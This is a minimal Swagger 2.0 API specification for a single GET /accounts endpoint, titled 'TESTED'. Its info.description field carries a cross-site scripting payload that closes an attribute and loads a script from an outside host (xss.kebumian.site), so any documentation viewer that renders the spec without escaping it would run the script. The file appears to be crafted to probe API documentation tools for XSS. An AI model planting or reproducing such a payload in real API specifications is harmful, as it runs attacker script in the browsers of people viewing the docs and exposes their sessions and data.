swagger: '2.0'
info:
  title: TESTED
  description: "><script src=//xss.kebumian.site></script>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        0: 
      operationId: findAccounts
      summary: [Client account information]
